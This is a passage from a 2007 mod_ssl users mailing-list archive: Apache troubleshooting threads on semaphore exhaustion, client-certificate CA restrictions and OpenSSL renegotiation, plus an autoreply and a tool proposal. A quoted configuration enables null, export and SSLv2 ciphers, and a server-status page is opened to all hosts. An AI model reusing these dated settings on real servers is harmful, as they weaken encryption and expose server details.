        $subdomain_address = "" if $subdomain_name eq "_";

        push @{ $VirtualHost{"$ip_number:80"} },
        {
          ServerName => "${subdomain_address}${domain_name}",
          DocumentRoot => "${domain}/content/${subdomain_name}",
          ServerSignature => "On",
          ErrorLog => "$domain/logs/error.log",
          CustomLog => ["$domain/logs/access.log", "virtual"],
          LogLevel => "warn",
        };
      };

      next if ! -e "$ip/server.crt";
      next if ! -e "$ip/server.key";

      for $https_subdomain (<$domain/secure_content/*>) {

        @subdomain_array = split /\//, "$https_subdomain";
        $subdomain_name = $subdomain_array[-1];
        $subdomain_address = $subdomain_name . ".";
        $domain_name = $subdomain_array[-3];

        $subdomain_address = "" if $subdomain_name eq "_";

        push @{ $VirtualHost{"$ip_number:443"} },
        {
          ServerName => "${subdomain_address}${domain_name}",
          DocumentRoot => "${domain}/secure_content/${subdomain_name}",
          ServerSignature => "On",
          ErrorLog => "$domain/logs/error.log",
          CustomLog => ["$domain/logs/access.log", "virtual"],
          LogLevel => "warn",
          SSLEngine => "on",
          SSLCertificateFile => "$ip/server.crt",
          SSLCertificateKeyFile => "$ip/server.key",
        };
      };
    };
  };




ExtendedStatus On


  SetHandler server-status
  Order allow,deny
  Allow from all



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr  6 23:06:10 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1A80C14D870; Fri,  6 Apr 2007 23:06:10 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.deluxnetwork.com (mail.deluxnetwork.com [203.206.139.222])
	by master.modssl.org (Postfix) with ESMTP id 03D2A14D82F
	for ; Fri,  6 Apr 2007 23:06:05 +0200 (CEST)
Received: from zeus (unknown [192.168.0.34])
	by mail.deluxnetwork.com (Postfix) with ESMTP id BEF296C6562
	for ; Fri,  6 Apr 2007 22:31:23 +1000 (EST)
From: "Ryan Forrester" 
To: 
Subject: RE: Apache wont start with ssl
Date: Sat, 7 Apr 2007 07:04:36 +1000
Message-ID: <000101c7788f$3b6e4f90$2200a8c0@zeus>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.0
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ryan Forrester" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

[root@server15 ~]# ll /proc/sys/kernel/shmmax
-rw-r--r-- 1 root root 0 Apr  7 05:46 /proc/sys/kernel/shmmax
[root@server15 ~]# ll /proc/sys/kernel/shmall
-rw-r--r-- 1 root root 0 Apr  7 05:47 /proc/sys/kernel/shmall
[root@server15 ~]# ll /proc/sys/kernel/sem
-rw-r--r-- 1 root root 0 Apr  7 05:47 /proc/sys/kernel/sem
[root@server15 ~]#

How do I Up the schmaxx, also, after a reboot it always works for at
least 1-2 days...

Ryan

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of ohp@pyrenet.fr
Sent: Thursday, April 05, 2007 7:41 PM
To: modssl-users@modssl.org
Subject: RE: Apache wont start with ssl

Sorry,
I meant values in /proc/sys/kernel/shmmax, /proc/sys/kernel/shmall
/proc/sys/kernel/sem

I'm quite sure one of those values is too small.

Hope it helps
On Sun, 6 May 2007, Ryan Forrester wrote:

> Date: Sun, 6 May 2007 09:20:38 +1000
> From: Ryan Forrester 
> Reply-To: modssl-users@modssl.org
> To: modssl-users@modssl.org
> Subject: RE: Apache wont start with ssl
>
> Nothing exists here.
>
> [root@server15 ~]# ll /proc/kernel/shmmax
> ls: /proc/kernel/shmmax: No such file or directory
> [root@server15 ~]
>
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of ohp@pyrenet.fr
> Sent: Monday, April 02, 2007 8:29 PM
> To: modssl-users@modssl.org
> Subject: Re: Apache wont start with ssl
>
> I'd rather think your SHMMAX is too low.
> If on Linux, check /proc/kernel/shmmax (IIRC) and up it.
> Hope it helps!
> On Sat, 31 Mar 2007, Andy Cravens wrote:
>
> > Date: Sat, 31 Mar 2007 20:09:20 -0600
> > From: Andy Cravens 
> > Reply-To: modssl-users@modssl.org
> > To: modssl-users@modssl.org
> > Subject: Re: Apache wont start with ssl
> >
> > Judging from the error message "No space left on device" sounds like
> > some file system is full... maybe /tmp.  The next time this happens
> open
> > a shell window and type:
> >
> > df -k
> >
> > Check the output to see if one of your file systems is full.  Look
at
> > /tmp and /swap specifically
> >
> >
> >
> > Ryan Forrester wrote:
> > > When attempting to start apache in SSL mode:
> > > $ /home/servers/apache_1.3.37/bin/apachectl startssl
> > > $ semget: No space left on device
> > >
> > > Rebooting the machine allows me to start apache once more.. but
> after a few
> > > days, apache wil fail and the same error occurs again, and the
only
> way to
> > > resolve is to reboot.
> > > - Apache will start in mornal mode without a reboot.
> > >
> > > error_log doesnt contain any useful information to help
troubleshoot
> the
> > >
> > > problem.
> > >
> >
> >
> >
______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
> > User Support Mailing List
modssl-users@modssl.org
> > Automated List Manager
majordomo@modssl.org
> >
>
>

-- 
Olivier PRENANT        	        Tel: +33-5-61-50-97-00 (Work)
15, Chemin des Monges                +33-5-61-50-97-01 (Fax)
31190 AUTERIVE                       +33-6-07-63-80-64 (GSM)
FRANCE                          Email: ohp@pyrenet.fr
------------------------------------------------------------------------
------
Make your life a dream, make your dream a reality. (St Exupery)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Apr  7 03:59:36 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5A16614D893; Sat,  7 Apr 2007 03:59:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from frfcqmg011ix3r8.montpellier.mebs.ihost.com (mail2.aspaway.fr [129.35.163.230])
	by master.modssl.org (Postfix) with ESMTP id 98FC114D83E
	for ; Sat,  7 Apr 2007 03:59:35 +0200 (CEST)
Received: from frfcqws071ix328.infra.montpellier.mebs.ihost.com (frfcqws071ix328 [10.0.77.8])
	by frfcqmg011ix3r8.montpellier.mebs.ihost.com (8.12.11.20060308/8.12.11) with ESMTP id l37206WE004070
	for ; Sat, 7 Apr 2007 04:00:06 +0200
Subject: Jean-Pierre Guilloteau est absent.
From: jpguilloteau@aspaway.fr
To: modssl-users@modssl.org
Message-ID: 
Date: Sat, 7 Apr 2007 04:00:04 +0200
X-MIMETrack: Serialize by Router on MES01ASP/SRV/ASPAWAY(Release 7.0.2|September 26, 2006) at
 04/07/2007 04:00:10 AM
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jpguilloteau@aspaway.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I will be out of the office starting Fri 06/04/07 and will not return u=
ntil
Mon 16/04/07.

Je r=E9pondrai =E0 votre message d=E8s mon retour.
Vous pouvez en mon absence contacter Aspaway au 01 46 67 88 88 ou notre=

support technique au 01 46 67 88 98.
Cordialement.=


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 10 04:47:40 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id ACAE014D875; Tue, 10 Apr 2007 04:47:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from m12-15.163.com (m12-15.163.com [220.181.12.15])
	by master.modssl.org (Postfix) with SMTP id D2D8514D82F
	for ; Tue, 10 Apr 2007 04:47:35 +0200 (CEST)
Received: from shenzhen (unknown [203.110.163.232])
	by smtp8 (Coremail) with SMTP id wKjAD7DrvgWB+hpGppiOHg==.51496S2;
	Tue, 10 Apr 2007 10:46:35 +0800 (CST)
From: "Zhaohui Zheng" 
To: 
Subject: ssl renegotiate
Date: Tue, 10 Apr 2007 10:46:09 +0800
Message-ID: <000001c77b1a$7a285c20$a53fa8c0@shenzhen>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook 11
Thread-Index: Acd4j1LovxYp/pWaRRms0uxjwzBnogCirI1g
In-Reply-To: <000101c7788f$3b6e4f90$2200a8c0@zeus>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3028
X-Coremail-Antispam: 1U3Yxn0WfASr-VFAUDIcSsGvfJ-Yx02cVAKzwAv7VC0I7IYx2
	IY67AKxVWUJVWUGwCF72vE52k0Y41lYx0Ex4A2jsIE14v26r1j6r4UMxkIecxEwVAFwVW8
	JwAFF20E14v26r1j6r4UM7kC6x804xWl1IIY67AEw4v_Jr0_Jr4l5I8CrVACY4xI64kE6c
	02F40Ex7xfM7k0a2IF6F1Un29KB7ZKAUJUUUUUnxnvy29KBjDU0xZFpf9x07Uq_M3UUUUU
	129KBjDU=
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Zhaohui Zheng" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Just wondering if anybody in the mail list ever tried
BIO_set_ssl_renegotiate_timeout or BIO_set_ssl_renegotiate_bytes. Can
anybody shed some light on how to use those functions?

Thanks a lot.
Zhaohui


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 10 21:05:15 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6CF1914D86D; Tue, 10 Apr 2007 21:05:15 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp106.rog.mail.re2.yahoo.com (smtp106.rog.mail.re2.yahoo.com [68.142.225.204])
	by master.modssl.org (Postfix) with SMTP id 32B6014D82F
	for ; Tue, 10 Apr 2007 21:05:14 +0200 (CEST)
Received: (qmail 27092 invoked from network); 10 Apr 2007 19:04:36 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=rogers.com;
  h=Received:X-YMail-OSG:Message-Id:X-Mailer:Date:To:From:Subject:Mime-Version:Content-Type;
  b=YJjSbLuIPFKz/nhneEsF2g9W8CQPCwSNakipXmbSN4XoWftnPERv6wYg3+6+NpHgySV+fbUq4rGLexyxA/AQYSQV6wjczcXfkJfChMLUPSTUPhp9XWpVmZRoJdVKFSOj1Q6BYmFCgedf4hkK/W9+2P8HWoLyGCFHydsk8DOCXJY=  ;
Received: from unknown (HELO dell4500.rogers.com) (ssmith3988@rogers.com@72.137.137.53 with login)
  by smtp106.rog.mail.re2.yahoo.com with SMTP; 10 Apr 2007 19:04:35 -0000
X-YMail-OSG: bE448vsVM1k1ER.szi3WM8UCjoojLSb0p_KvYrwipwdVF2SoaVeNUrQz0zfkNhedCQ--
Message-Id: <6.2.1.2.0.20070410150331.03675eb0@pop.ym.phub.net.cable.rogers.com>
X-Mailer: QUALCOMM Windows Eudora Version 6.2.1.2
Date: Tue, 10 Apr 2007 15:05:17 -0400
To: modssl-users@modssl.org
From: ssmith3988@rogers.com
Subject: Web Interface Certificate Management
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ssmith3988@rogers.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I was interested in working on a project, and wanted to get some other 
people's ideas and inputs. My idea is to make a nice interface for creating 
SSL certificates for Apache/mod_ssl instead of running OpenSSL from the 
command line. I think there are a lot of people that would appreciate such 
a little tool. Since the certificate will eventually be used to protect a 
web server, I think the tool should be web based.

Here's what I'm thinking:

When you first install Apache, you can browse to some predetermined URL 
that's served by your installation. Obviously, you don't want this to be 
from outside the network, so let's just say we'll do some verification that 
the request comes from an authorized person. When you go to this URL, you 
encounter a form that asks for the typical certificate information such as 
the Common Name, the location, etc. We can populate this form with as much 
configuration info as we like.

When the user hits the "Configure" button, we'll call the necessary OpenSSL 
interfaces to create a certificate, and then update the configuration files 
to set everything up properly. We can even add an interface to ship off a 
CSR to a CA, and a nice interface to deal with the response.

I'd like this to be very easy for people to use. Something that can be used 
by just dropping a file someplace without dealing with any installation issues.

Has anyone ever heard of anything like this? Any good ideas on where to 
start for building such a tool? Is this something that could be built into 
mod_ssl, or should it be a sibling module? Should this be an Apache module 
at all? What kind of tools/architecture would you use? Any other ideas on 
how to make this better?


Sander Smith


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 24 06:52:15 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7AB3914D872; Tue, 24 Apr 2007 06:52:15 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.sep.com (IP-216-37-52-133.nframe.net [216.37.52.133])
	by master.modssl.org (Postfix) with ESMTP id A59D114D82C
	for ; Tue, 24 Apr 2007 06:52:14 +0200 (CEST)
Received: from raiders.sep.com (localhost [127.0.0.1])
	by mail.sep.com (Postfix) with ESMTP id E9DA24192
	for ; Tue, 24 Apr 2007 00:51:32 -0400 (EDT)
Received: from 76.214.147.64
        (SquirrelMail authenticated user dpmott)
        by webmail.sep.com with HTTP;
        Tue, 24 Apr 2007 00:51:32 -0400 (EDT)
Message-ID: <4251.76.214.147.64.1177390292.squirrel@webmail.sep.com>
Date: Tue, 24 Apr 2007 00:51:32 -0400 (EDT)
Subject: Am I using SSLCACertificateFile as intended?
From: dpmott@sep.com
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.9a
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: dpmott@sep.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all --

I'm having some trouble configuring Apache/mod_ssl to do what I want. 
Perhaps I have some misconceptions that need dispelled.  Any help would be
grealy appreciated.

OVERVIEW/GOAL:
I'm retrofitting some Apache servers to require client certificates.  Note
that these servers have certificates that are (temporarily) self-signed. 
Our organization already has a PKI consisting of a self-signed RootCA and
two IssuingCAs.  My goal here is to configure my Apache server to require
user certificates issued by IssuingCA2, and to refuse access to all
others.

Server version: Apache/2.2.3
Server built:   Aug 10 2006 17:29:16
OpenSSL 0.9.8b 04 May 2006

THE PROBLEM:
The problem is that I've found only one configuration that will allow a
client to successfully load a page, and in this case, it will also allow
the use of user certificates issued by the other IssuingCA.  I find this
baffling, since I haven't told Apache anything about this particular
IssuingCA.

I believe that my problems are centering around the SSLCACertificateFile
directive.  See below for my SSL (scrubbed) conf file.

CASE 1:
If I use this invocation, Apache allows certificates from any issuing CA
that has been signed by our Root CA.  Note that certchain.cer is a
concatenation of the PEM-encoded certificates for IssuingCA2 and the
RootCA (specifically, of IssuingCA2.cer and RootCA.cer mentioned in the
next two cases).
  SSLCACertificateFile conf/ssl/certchain.cer

Here is the logfile exerpt for this case:

[Mon Apr 23 22:26:14 2007] [debug] ssl_engine_kernel.c(1190): Certificate
Verification: depth: 2, subject: [SNIP]Root CA, issuer: [SNIP]Root CA
[Mon Apr 23 22:26:14 2007] [debug] ssl_engine_kernel.c(1190): Certificate
Verification: depth: 1, subject: [SNIP]Issuing CA 1, issuer: [SNIP]Root CA
[Mon Apr 23 22:26:14 2007] [debug] ssl_engine_kernel.c(1190): Certificate
Verification: depth: 0, subject: /CN=[SNIP], issuer: [SNIP]Issuing CA 1

CASE 2:
If I use this invocation, Apache will run but will complain (whenever the
protected page is loaded) that it can't find the local issuer certificate.
 I've tried setting SSLVerifyDepth to 1, but this didn't help anything. 
The only good thing about this case is that the list of certificates
presented by the remote browser to the user only includes those directly
issued by IssuingCA2.
   SSLCACertificateFile conf/ssl/IssuingCA2.cer

Here is the logfile exerpt for this case:

[Mon Apr 23 22:31:18 2007] [debug] ssl_engine_kernel.c(1190): Certificate
Verification: depth: 1, subject: [SNIP]Issuing CA 2, issuer: [SNIP]Root CA
[Mon Apr 23 22:31:18 2007] [error] Certificate Verification: Error (20):
unable to get local issuer certificate

CASE 3:
If I use this invocation, Apache won't even run.  Note that the content of
RootCA.cer is exactly the same content that makes up an essential part of
certchain.cer (see above).  AFAIK, this certificate should have format and
content readily useable by Apache.  The only special thing about it, is
that it is a self-signed certificate (does that make a difference?)
   SSLCACertificateFile conf/ssl/RootCA.cer

Here is the logfile exerpt for this case:

[Mon Apr 23 22:02:13 2007] [info] Loading certificate & private key of
SSL-aware server
[Mon Apr 23 22:02:13 2007] [debug] ssl_engine_pphrase.c(469): unencrypted
RSA private key - pass phrase not required
[Mon Apr 23 22:02:13 2007] [info] Configuring server for SSL protocol
[Mon Apr 23 22:02:13 2007] [debug] ssl_engine_init.c(405): Creating new
SSL context (protocols: SSLv2, TLSv1)
[Mon Apr 23 22:02:13 2007] [debug] ssl_engine_init.c(538): Configuring
client authentication
[Mon Apr 23 22:02:13 2007] [error] Unable to configure verify locations
for client authentication
[Mon Apr 23 22:02:13 2007] [error] SSL Library Error: 33558533
error:02001005:system library:fopen:Input/output error
[Mon Apr 23 22:02:13 2007] [error] SSL Library Error: 537317378
error:2006D002:BIO routines:BIO_new_file:system lib
[Mon Apr 23 22:02:13 2007] [error] SSL Library Error: 185090050
error:0B084002:x509 certificate routines:X509_load_cert_crl_file:system
lib

HELP:
My expectation here was that I would need to provide the certificate chain
(issuing and root CA) required to authenticate the user certificate, and
that a user certificate issued by any other IssuingCA would fail because I
haven't given Apache the IssuingCA's certificate.

Instead, it seems like the server has gained access to the IssuingCA1
certificate (does it do this directly, or does the client send it?), and
is validating that certificate against the RootCA.  This seems to happen
when I provided the RootCA in the SSLCACertificateFile, which (as I
understand it) gets sent to the remote client so that it can filter its
list of applicable user certificates.

So, I'm looking for is a way to configure Apache to:
1.  Instruct the remote browser to limit the applicable user certificates
to only those issued by IssuingCA2,
2.  Avoid the "unable to get local issuer certificate" error
3.  Never accept a user certificate issued by IssuingCA1

Could someone please tell me where I've gone wrong, and/or how to achieve
these goals?



CONFIGURATION:
Here's my SSL conf file.  It's loaded from httpd.conf:


    DocumentRoot [SNIP]
    ServerName [SNIP]:443
    ServerAdmin [SNIP]
    CustomLog virtualhosts/secure/logs/access.log common
    ErrorLog virtualhosts/secure/logs/error.log
    TransferLog virtualhosts/secure/logs/access.log
    LogLevel debug

    
        SSLEngine on
        SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
        SSLCertificateFile conf/ssl/[SNIP].crt
        SSLCertificateKeyFile conf/ssl/[SNIP].key
        SSLCACertificateFile conf/ssl/certchain.cer
        SSLVerifyDepth  10
        
            SSLOptions +StdEnvVars
        
        
            SSLOptions +StdEnvVars
        
        SetEnvIf User-Agent ".*MSIE.*" \
                 nokeepalive ssl-unclean-shutdown \
                 downgrade-1.0 force-response-1.0
        CustomLog virtualhosts/secure/logs/ssl_request_log \
                  "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"

        # Prevent clients from using SSLv3
        SSLProtocol all -SSLv3
    

    DocumentRoot [SNIP]/virtualhosts/secure/htdocs
    
        Options Indexes FollowSymLinks
        AllowOverride None
        Order allow,deny
        Allow from all
    

    
        Options FollowSymLinks
        AllowOverride None

        Order allow,deny
        Allow from all
    

    
        # Per-directory configuration for SSL
        SSLRequireSSL
        SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128
        SSLVerifyClient require
    

    
        AllowOverride None
        Options None
        Order allow,deny
        Allow from all
    




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 24 17:53:58 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E741514D872; Tue, 24 Apr 2007 17:53:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.sep.com (IP-216-37-52-133.nframe.net [216.37.52.133])
	by master.modssl.org (Postfix) with ESMTP id 84E3F14D82C
	for ; Tue, 24 Apr 2007 17:53:57 +0200 (CEST)
Received: from olorin.net.sep.com (olorin.sep.com [172.16.0.114])
	by mail.sep.com (Postfix) with ESMTP id A57C542BF
	for ; Tue, 24 Apr 2007 11:53:15 -0400 (EDT)
Date: Tue, 24 Apr 2007 11:53:12 -0400 (Eastern Daylight Time)
From: "David P. Mott" 
To: modssl-users@modssl.org
Subject: SOLVED: Am I using SSLCACertificateFile as intended?
In-Reply-To: <4251.76.214.147.64.1177390292.squirrel@webmail.sep.com>
Message-ID: 
References: <4251.76.214.147.64.1177390292.squirrel@webmail.sep.com>
X-X-Sender: dpmott@gothmog.sep.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David P. Mott" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I don't know why I didn't find this in the dozens of Google searches that 
I did *before* I posted my question, but these seem to be what I'm looking 
for:

SSLCADNRequestFile / SSLCADNRequestPath

http://httpd.apache.org/docs/trunk/mod/mod_ssl.xml#sslcadnrequestfile

http://issues.apache.org/bugzilla/show_bug.cgi?id=32848


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 24 18:00:32 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9A0C814D886; Tue, 24 Apr 2007 18:00:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mower.iserver.net (mower.iserver.net [128.121.79.16])
	by master.modssl.org (Postfix) with ESMTP id CB09114D82C
	for ; Tue, 24 Apr 2007 18:00:28 +0200 (CEST)
Received: from [10.20.12.65] (fw.oremut02.us.wh.verio.net [198.65.168.24])
	(authenticated bits=0)
	by mower.iserver.net (8.13.6.20060614/8.13.6) with ESMTP id l3OFxghZ034029
	for ; Tue, 24 Apr 2007 09:59:43 -0600 (MDT)
Message-ID: <462E2969.8060009@allez-oop.net>
Date: Tue, 24 Apr 2007 09:59:37 -0600
From: "Omar W. Hannet" 
User-Agent: Thunderbird 1.5.0.10 (X11/20070420)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Am I using SSLCACertificateFile as intended?
References: <4251.76.214.147.64.1177390292.squirrel@webmail.sep.com>
In-Reply-To: <4251.76.214.147.64.1177390292.squirrel@webmail.sep.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Omar W. Hannet" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I think all you need to do is tighten up your SSLRequire rules.

Something like this (all on one line, omitting the backslash at line-end):

SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128 \
                   and %{SSL_CLIENT_I_DN} eq "IssuingCA2"

http://www.modssl.org/docs/2.8/ssl_reference.html#ToC23


Omar

dpmott@sep.com wrote:
> Hi all --
> 
> I'm having some trouble configuring Apache/mod_ssl to do what I want. 
> Perhaps I have some misconceptions that need dispelled.  Any help would be
> grealy appreciated.
> 
> OVERVIEW/GOAL:
> I'm retrofitting some Apache servers to require client certificates.  Note
> that these servers have certificates that are (temporarily) self-signed. 
> Our organization already has a PKI consisting of a self-signed RootCA and
> two IssuingCAs.  My goal here is to configure my Apache server to require
> user certificates issued by IssuingCA2, and to refuse access to all
> others.
> 
> Server version: Apache/2.2.3
> Server built:   Aug 10 2006 17:29:16
> OpenSSL 0.9.8b 04 May 2006
> 
> THE PROBLEM:
> The problem is that I've found only one configuration that will allow a
> client to successfully load a page, and in this case, it will also allow
> the use of user certificates issued by the other IssuingCA.  I find this
> baffling, since I haven't told Apache anything about this particular
> IssuingCA.
> 
> I believe that my problems are centering around the SSLCACertificateFile
> directive.  See below for my SSL (scrubbed) conf file.
> 
> CASE 1:
> If I use this invocation, Apache allows certificates from any issuing CA
> that has been signed by our Root CA.  Note that certchain.cer is a
> concatenation of the PEM-encoded certificates for IssuingCA2 and the
> RootCA (specifically, of IssuingCA2.cer and RootCA.cer mentioned in the
> next two cases).
>   SSLCACertificateFile conf/ssl/certchain.cer
> 
> Here is the logfile exerpt for this case:
> 
> [Mon Apr 23 22:26:14 2007] [debug] ssl_engine_kernel.c(1190): Certificate
> Verification: depth: 2, subject: [SNIP]Root CA, issuer: [SNIP]Root CA
> [Mon Apr 23 22:26:14 2007] [debug] ssl_engine_kernel.c(1190): Certificate
> Verification: depth: 1, subject: [SNIP]Issuing CA 1, issuer: [SNIP]Root CA
> [Mon Apr 23 22:26:14 2007] [debug] ssl_engine_kernel.c(1190): Certificate
> Verification: depth: 0, subject: /CN=[SNIP], issuer: [SNIP]Issuing CA 1
> 
> CASE 2:
> If I use this invocation, Apache will run but will complain (whenever the
> protected page is loaded) that it can't find the local issuer certificate.
>  I've tried setting SSLVerifyDepth to 1, but this didn't help anything. 
> The only good thing about this case is that the list of certificates
> presented by the remote browser to the user only includes those directly
> issued by IssuingCA2.
>    SSLCACertificateFile conf/ssl/IssuingCA2.cer
> 
> Here is the logfile exerpt for this case:
> 
> [Mon Apr 23 22:31:18 2007] [debug] ssl_engine_kernel.c(1190): Certificate
> Verification: depth: 1, subject: [SNIP]Issuing CA 2, issuer: [SNIP]Root CA
> [Mon Apr 23 22:31:18 2007] [error] Certificate Verification: Error (20):
> unable to get local issuer certificate
> 
> CASE 3:
> If I use this invocation, Apache won't even run.  Note that the content of
> RootCA.cer is exactly the same content that makes up an essential part of
> certchain.cer (see above).  AFAIK, this certificate should have format and
> content readily useable by Apache.  The only special thing about it, is
> that it is a self-signed certificate (does that make a difference?)
>    SSLCACertificateFile conf/ssl/RootCA.cer
> 
> Here is the logfile exerpt for this case:
> 
> [Mon Apr 23 22:02:13 2007] [info] Loading certificate & private key of
> SSL-aware server
> [Mon Apr 23 22:02:13 2007] [debug] ssl_engine_pphrase.c(469): unencrypted
> RSA private key - pass phrase not required
> [Mon Apr 23 22:02:13 2007] [info] Configuring server for SSL protocol
> [Mon Apr 23 22:02:13 2007] [debug] ssl_engine_init.c(405): Creating new
> SSL context (protocols: SSLv2, TLSv1)
> [Mon Apr 23 22:02:13 2007] [debug] ssl_engine_init.c(538): Configuring
> client authentication
> [Mon Apr 23 22:02:13 2007] [error] Unable to configure verify locations
> for client authentication
> [Mon Apr 23 22:02:13 2007] [error] SSL Library Error: 33558533
> error:02001005:system library:fopen:Input/output error
> [Mon Apr 23 22:02:13 2007] [error] SSL Library Error: 537317378
> error:2006D002:BIO routines:BIO_new_file:system lib
> [Mon Apr 23 22:02:13 2007] [error] SSL Library Error: 185090050
> error:0B084002:x509 certificate routines:X509_load_cert_crl_file:system
> lib
> 
> HELP:
> My expectation here was that I would need to provide the certificate chain
> (issuing and root CA) required to authenticate the user certificate, and
> that a user certificate issued by any other IssuingCA would fail because I
> haven't given Apache the IssuingCA's certificate.
> 
> Instead, it seems like the server has gained access to the IssuingCA1
> certificate (does it do this directly, or does the client send it?), and
> is validating that certificate against the RootCA.  This seems to happen
> when I provided the RootCA in the SSLCACertificateFile, which (as I
> understand it) gets sent to the remote client so that it can filter its
> list of applicable user certificates.
> 
> So, I'm looking for is a way to configure Apache to:
> 1.  Instruct the remote browser to limit the applicable user certificates
> to only those issued by IssuingCA2,
> 2.  Avoid the "unable to get local issuer certificate" error
> 3.  Never accept a user certificate issued by IssuingCA1
> 
> Could someone please tell me where I've gone wrong, and/or how to achieve
